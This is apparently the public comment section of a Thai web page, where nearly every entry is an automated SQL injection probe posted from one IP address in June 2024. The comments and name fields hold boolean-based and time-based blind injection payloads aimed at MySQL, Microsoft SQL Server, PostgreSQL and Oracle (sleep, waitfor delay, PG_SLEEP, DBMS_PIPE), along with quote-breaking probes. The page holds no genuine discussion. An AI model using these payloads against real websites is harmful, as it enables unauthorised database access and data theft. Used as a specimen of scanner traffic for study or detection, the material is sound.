22 มิ.ย. 67 00:56:19 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:56:43 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:56:46 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:57:14 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:57:16 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:57:18 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:57:19 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:57:48 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:58:20 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:58:50 IP 91.92.249.108 โดย : dwUQQUrL
555yq1Jhyto
22 มิ.ย. 67 00:59:05 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:59:54 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:59:59 IP 91.92.249.108 โดย : dwUQQUrL
-1 OR 2+244-244-1=0+0+0+1 --
22 มิ.ย. 67 01:00:00 IP 91.92.249.108 โดย : dwUQQUrL
-1 OR 3+244-244-1=0+0+0+1 --
22 มิ.ย. 67 01:00:02 IP 91.92.249.108 โดย : dwUQQUrL
-1 OR 2+118-118-1=0+0+0+1
22 มิ.ย. 67 01:00:04 IP 91.92.249.108 โดย : dwUQQUrL
-1 OR 3+118-118-1=0+0+0+1
22 มิ.ย. 67 01:00:08 IP 91.92.249.108 โดย : dwUQQUrL
-1' OR 2+719-719-1=0+0+0+1 --
22 มิ.ย. 67 01:00:10 IP 91.92.249.108 โดย : dwUQQUrL
-1' OR 3+719-719-1=0+0+0+1 --
22 มิ.ย. 67 01:00:11 IP 91.92.249.108 โดย : dwUQQUrL
-1' OR 2+621-621-1=0+0+0+1 or 'hNpV8KHE'='
22 มิ.ย. 67 01:00:13 IP 91.92.249.108 โดย : dwUQQUrL
-1' OR 3+621-621-1=0+0+0+1 or 'hNpV8KHE'='
22 มิ.ย. 67 01:00:16 IP 91.92.249.108 โดย : dwUQQUrL
-1" OR 2+436-436-1=0+0+0+1 --
22 มิ.ย. 67 01:00:21 IP 91.92.249.108 โดย : dwUQQUrL
-1" OR 3+436-436-1=0+0+0+1 --
22 มิ.ย. 67 01:00:22 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:00:25 IP 91.92.249.108 โดย : dwUQQUrL
555*if(now()=sysdate(),sleep(15),0)
22 มิ.ย. 67 01:01:00 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:01:02 IP 91.92.249.108 โดย : dwUQQUrL
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
22 มิ.ย. 67 01:01:27 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:01:29 IP 91.92.249.108 โดย : dwUQQUrL
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
22 มิ.ย. 67 01:01:56 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:01:57 IP 91.92.249.108 โดย : dwUQQUrL
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
22 มิ.ย. 67 01:02:24 IP 91.92.249.108 โดย : dwUQQUrL
555-1; waitfor delay '0:0:15' --
22 มิ.ย. 67 01:02:45 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:02:47 IP 91.92.249.108 โดย : dwUQQUrL
555-1); waitfor delay '0:0:15' --
22 มิ.ย. 67 01:03:15 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:03:17 IP 91.92.249.108 โดย : dwUQQUrL
555-1)); waitfor delay '0:0:15' --
22 มิ.ย. 67 01:03:44 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:03:45 IP 91.92.249.108 โดย : dwUQQUrL
555-1 waitfor delay '0:0:15' --
22 มิ.ย. 67 01:04:19 IP 91.92.249.108 โดย : dwUQQUrL
555yrNz0kee'; waitfor delay '0:0:15' --
22 มิ.ย. 67 01:04:47 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:04:49 IP 91.92.249.108 โดย : dwUQQUrL
555Y8OAb4Ai'); waitfor delay '0:0:15' --
22 มิ.ย. 67 01:05:10 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:05:12 IP 91.92.249.108 โดย : dwUQQUrL
555qbZOkZLo')); waitfor delay '0:0:15' --
22 มิ.ย. 67 01:05:49 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:05:51 IP 91.92.249.108 โดย : dwUQQUrL
555-1 OR 938=(SELECT 938 FROM PG_SLEEP(15))--
22 มิ.ย. 67 01:06:24 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:06:25 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:06:28 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:06:29 IP 91.92.249.108 โดย : dwUQQUrL
555-1) OR 213=(SELECT 213 FROM PG_SLEEP(15))--
22 มิ.ย. 67 01:06:47 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:06:56 IP 91.92.249.108 โดย : dwUQQUrL
555-1)) OR 311=(SELECT 311 FROM PG_SLEEP(15))--
22 มิ.ย. 67 01:07:13 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:07:21 IP 91.92.249.108 โดย : dwUQQUrL
555BAwlSzDt' OR 223=(SELECT 223 FROM PG_SLEEP(15))--
22 มิ.ย. 67 01:07:41 IP 91.92.249.108 โดย : dwUQQUrL
200m4SsE16
22 มิ.ย. 67 01:07:49 IP 91.92.249.108 โดย : dwUQQUrL
555ROYcI0qf') OR 745=(SELECT 745 FROM PG_SLEEP(15))--
22 มิ.ย. 67 01:08:10 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:08:18 IP 91.92.249.108 โดย : dwUQQUrL
-1 OR 2+941-941-1=0+0+0+1 --
22 มิ.ย. 67 01:08:20 IP 91.92.249.108 โดย : dwUQQUrL
-1 OR 3+941-941-1=0+0+0+1 --
22 มิ.ย. 67 01:08:21 IP 91.92.249.108 โดย : dwUQQUrL
-1 OR 2+76-76-1=0+0+0+1
22 มิ.ย. 67 01:08:23 IP 91.92.249.108 โดย : dwUQQUrL
-1 OR 3+76-76-1=0+0+0+1
22 มิ.ย. 67 01:08:24 IP 91.92.249.108 โดย : dwUQQUrL
-1' OR 2+189-189-1=0+0+0+1 --
22 มิ.ย. 67 01:08:26 IP 91.92.249.108 โดย : dwUQQUrL
-1' OR 3+189-189-1=0+0+0+1 --
22 มิ.ย. 67 01:08:29 IP 91.92.249.108 โดย : dwUQQUrL
-1' OR 2+540-540-1=0+0+0+1 or 'NKLA9oGn'='
22 มิ.ย. 67 01:08:30 IP 91.92.249.108 โดย : dwUQQUrL
-1' OR 3+540-540-1=0+0+0+1 or 'NKLA9oGn'='
22 มิ.ย. 67 01:08:33 IP 91.92.249.108 โดย : dwUQQUrL
-1" OR 2+807-807-1=0+0+0+1 --
22 มิ.ย. 67 01:08:34 IP 91.92.249.108 โดย : dwUQQUrL
-1" OR 3+807-807-1=0+0+0+1 --
22 มิ.ย. 67 01:08:36 IP 91.92.249.108 โดย : dwUQQUrL
555ICsk6PKP')) OR 546=(SELECT 546 FROM PG_SLEEP(15))--
22 มิ.ย. 67 01:08:37 IP 91.92.249.108 โดย : dwUQQUrL
20*if(now()=sysdate(),sleep(15),0)
22 มิ.ย. 67 01:09:08 IP 91.92.249.108 โดย : dwUQQUrL
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
22 มิ.ย. 67 01:09:09 IP 91.92.249.108 โดย : dwUQQUrL
200'XOR(20*if(now()=sysdate(),sleep(15),0))XOR'Z
22 มิ.ย. 67 01:09:51 IP 91.92.249.108 โดย : dwUQQUrL
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
22 มิ.ย. 67 01:09:54 IP 91.92.249.108 โดย : dwUQQUrL
555'"
22 มิ.ย. 67 01:09:56 IP 91.92.249.108 โดย : dwUQQUrL
555????%2527%2522\'\"
22 มิ.ย. 67 01:09:57 IP 91.92.249.108 โดย : dwUQQUrL
@@SqV9k
22 มิ.ย. 67 01:09:59 IP 91.92.249.108 โดย : dwUQQUrL
200"XOR(20*if(now()=sysdate(),sleep(15),0))XOR"Z
22 มิ.ย. 67 01:10:27 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:10:32 IP 91.92.249.108 โดย : dwUQQUrL
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
22 มิ.ย. 67 01:11:05 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:11:09 IP 91.92.249.108 โดย : dwUQQUrL
20-1; waitfor delay '0:0:15' --
22 มิ.ย. 67 01:11:37 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:11:43 IP 91.92.249.108 โดย : dwUQQUrLYUm1jskg
20-1); waitfor delay '0:0:15' --
22 มิ.ย. 67 01:12:07 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:12:13 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:12:14 IP 91.92.249.108 โดย : -1 OR 2+649-649-1=0+0+0+1 --
555
22 มิ.ย. 67 01:12:16 IP 91.92.249.108 โดย : -1 OR 3+649-649-1=0+0+0+1 --
555
22 มิ.ย. 67 01:12:17 IP 91.92.249.108 โดย : -1 OR 2+438-438-1=0+0+0+1
555
22 มิ.ย. 67 01:12:19 IP 91.92.249.108 โดย : -1 OR 3+438-438-1=0+0+0+1
555
22 มิ.ย. 67 01:12:21 IP 91.92.249.108 โดย : -1' OR 2+93-93-1=0+0+0+1 --
555
22 มิ.ย. 67 01:12:23 IP 91.92.249.108 โดย : -1' OR 3+93-93-1=0+0+0+1 --
555
22 มิ.ย. 67 01:12:24 IP 91.92.249.108 โดย : -1' OR 2+539-539-1=0+0+0+1 or 'QyWJtehZ'='
555
22 มิ.ย. 67 01:12:26 IP 91.92.249.108 โดย : -1' OR 3+539-539-1=0+0+0+1 or 'QyWJtehZ'='
555
22 มิ.ย. 67 01:12:28 IP 91.92.249.108 โดย : -1" OR 2+765-765-1=0+0+0+1 --
555
22 มิ.ย. 67 01:12:33 IP 91.92.249.108 โดย : -1" OR 3+765-765-1=0+0+0+1 --
20-1)); waitfor delay '0:0:15' --
22 มิ.ย. 67 01:12:37 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:13:19 IP 91.92.249.108 โดย : if(now()=sysdate(),sleep(15),0)
20-1 waitfor delay '0:0:15' --
22 มิ.ย. 67 01:13:25 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:13:50 IP 91.92.249.108 โดย : dwUQQUrL0'XOR(if(now()=sysdate(),sleep(15),0))XOR'
201TLXOBat'; waitfor delay '0:0:15' --
22 มิ.ย. 67 01:13:56 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:14:20 IP 91.92.249.108 โดย : dwUQQUrL0"XOR(if(now()=sysdate(),sleep(15),0))XOR"
207NsLSk0N'); waitfor delay '0:0:15' --
22 มิ.ย. 67 01:14:30 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:14:50 IP 91.92.249.108 โดย : (select(0)from(select(sleep(15)))v)/*'+(select(0)f
20eGkC52RF')); waitfor delay '0:0:15' --
22 มิ.ย. 67 01:15:01 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:15:37 IP 91.92.249.108 โดย : dwUQQUrL-1; waitfor delay '0:0:15' --
20-1 OR 811=(SELECT 811 FROM PG_SLEEP(15))--
22 มิ.ย. 67 01:15:51 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:16:29 IP 91.92.249.108 โดย : dwUQQUrL-1); waitfor delay '0:0:15' --
20-1) OR 343=(SELECT 343 FROM PG_SLEEP(15))--
22 มิ.ย. 67 01:16:39 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:16:57 IP 91.92.249.108 โดย : dwUQQUrL-1 waitfor delay '0:0:15' --
20-1)) OR 886=(SELECT 886 FROM PG_SLEEP(15))--
22 มิ.ย. 67 01:17:04 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:17:37 IP 91.92.249.108 โดย : dwUQQUrLAYZPEBeK'; waitfor delay '0:0:15' --
200k7fVvxj' OR 392=(SELECT 392 FROM PG_SLEEP(15))--
22 มิ.ย. 67 01:17:43 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:18:06 IP 91.92.249.108 โดย : dwUQQUrLOTLTwhj4'); waitfor delay '0:0:15' --
208456H8uP') OR 43=(SELECT 43 FROM PG_SLEEP(15))--
22 มิ.ย. 67 01:18:15 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:19:03 IP 91.92.249.108 โดย : dwUQQUrLJ6ChIxUM')); waitfor delay '0:0:15' --
201FXePE33')) OR 900=(SELECT 900 FROM PG_SLEEP(15))--
22 มิ.ย. 67 01:19:07 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:19:33 IP 91.92.249.108 โดย : dwUQQUrLJccozlw2' OR 237=(SELECT 237 FROM PG_SLEEP
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
22 มิ.ย. 67 01:19:38 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:20:01 IP 91.92.249.108 โดย : dwUQQUrLOI3Z8ujy') OR 163=(SELECT 163 FROM PG_SLEE
20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
22 มิ.ย. 67 01:20:05 IP 91.92.249.108 โดย : dwUQQUrL
20'"
22 มิ.ย. 67 01:20:07 IP 91.92.249.108 โดย : dwUQQUrL
20????%2527%2522\'\"
22 มิ.ย. 67 01:20:09 IP 91.92.249.108 โดย : dwUQQUrL
@@NxY8m
22 มิ.ย. 67 01:20:10 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:20:28 IP 91.92.249.108 โดย : dwUQQUrLnhy7SUUL')) OR 779=(SELECT 779 FROM PG_SLE
20
22 มิ.ย. 67 01:20:38 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 01:20:57 IP 91.92.249.108 โดย : dwUQQUrL'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(
555
22 มิ.ย. 67 01:20:59 IP 91.92.249.108 โดย : dwUQQUrL'"
555
22 มิ.ย. 67 01:21:00 IP 91.92.249.108 โดย : dwUQQUrL????%2527%2522\'\"
555
22 มิ.ย. 67 01:21:02 IP 91.92.249.108 โดย : @@NaQzp
20
22 มิ.ย. 67 01:21:08 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:21:36 IP 91.92.249.108 โดย : dwUQQUrLms9WxVPr
20
22 มิ.ย. 67 01:22:03 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 01:22:04 IP 91.92.249.108 โดย : -1 OR 2+134-134-1=0+0+0+1 --
20
22 มิ.ย. 67 01:22:12 IP 91.92.249.108 โดย : -1 OR 3+134-134-1=0+0+0+1 --
20
22 มิ.ย. 67 01:22:14 IP 91.92.249.108 โดย : -1 OR 2+212-212-1=0+0+0+1
20
22 มิ.ย. 67 01:22:16 IP 91.92.249.108 โดย : -1 OR 3+212-212-1=0+0+0+1
20
22 มิ.ย. 67 01:22:21 IP 91.92.249.108 โดย : -1' OR 2+575-575-1=0+0+0+1 --
20
22 มิ.ย. 67 01:22:23 IP 91.92.249.108 โดย : -1' OR 3+575-575-1=0+0+0+1 --
20
22 มิ.ย. 67 01:22:26 IP 91.92.249.108 โดย : -1' OR 2+142-142-1=0+0+0+1 or 'AZnHbENw'='
20
22 มิ.ย. 67 01:22:28 IP 91.92.249.108 โดย : -1' OR 3+142-142-1=0+0+0+1 or 'AZnHbENw'='
20
22 มิ.ย. 67 01:22:30 IP 91.92.249.108 โดย : -1" OR 2+416-416-1=0+0+0+1 --
20
22 มิ.ย. 67 01:22:31 IP 91.92.249.108 โดย : -1" OR 3+416-416-1=0+0+0+1 --
20
22 มิ.ย. 67 01:23:24 IP 91.92.249.108 โดย : if(now()=sysdate(),sleep(15),0)
20
22 มิ.ย. 67 01:23:54 IP 91.92.249.108 โดย : dwUQQUrL0'XOR(if(now()=sysdate(),sleep(15),0))XOR'
20
22 มิ.ย. 67 01:24:22 IP 91.92.249.108 โดย : dwUQQUrL0"XOR(if(now()=sysdate(),sleep(15),0))XOR"
20
22 มิ.ย. 67 01:24:50 IP 91.92.249.108 โดย : (select(0)from(select(sleep(15)))v)/*'+(select(0)f
20
22 มิ.ย. 67 01:25:29 IP 91.92.249.108 โดย : dwUQQUrL-1; waitfor delay '0:0:15' --
20
22 มิ.ย. 67 01:25:58 IP 91.92.249.108 โดย : dwUQQUrL-1); waitfor delay '0:0:15' --
20
22 มิ.ย. 67 01:26:37 IP 91.92.249.108 โดย : dwUQQUrL-1 waitfor delay '0:0:15' --
20
22 มิ.ย. 67 01:27:05 IP 91.92.249.108 โดย : dwUQQUrLU4XGEi2d'; waitfor delay '0:0:15' --
20
22 มิ.ย. 67 01:27:31 IP 91.92.249.108 โดย : dwUQQUrLcFZ85sKp'); waitfor delay '0:0:15' --
20
22 มิ.ย. 67 01:28:02 IP 91.92.249.108 โดย : dwUQQUrLxsbsGy1Q')); waitfor delay '0:0:15' --
20
22 มิ.ย. 67 01:28:33 IP 91.92.249.108 โดย : dwUQQUrL3MgV2NUw' OR 550=(SELECT 550 FROM PG_SLEEP
20
22 มิ.ย. 67 01:29:03 IP 91.92.249.108 โดย : dwUQQUrL5h9bxCAx') OR 748=(SELECT 748 FROM PG_SLEE
20
22 มิ.ย. 67 01:29:28 IP 91.92.249.108 โดย : dwUQQUrLCG18Qqon')) OR 727=(SELECT 727 FROM PG_SLE
20
22 มิ.ย. 67 01:29:53 IP 91.92.249.108 โดย : dwUQQUrL'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(
20
22 มิ.ย. 67 01:29:55 IP 91.92.249.108 โดย : dwUQQUrL'"
20
22 มิ.ย. 67 01:29:56 IP 91.92.249.108 โดย : dwUQQUrL????%2527%2522\'\"
20
22 มิ.ย. 67 01:29:58 IP 91.92.249.108 โดย : @@38p5v
แสดงความเห็นของคุณ
โดย :


เรื่องอื่นๆ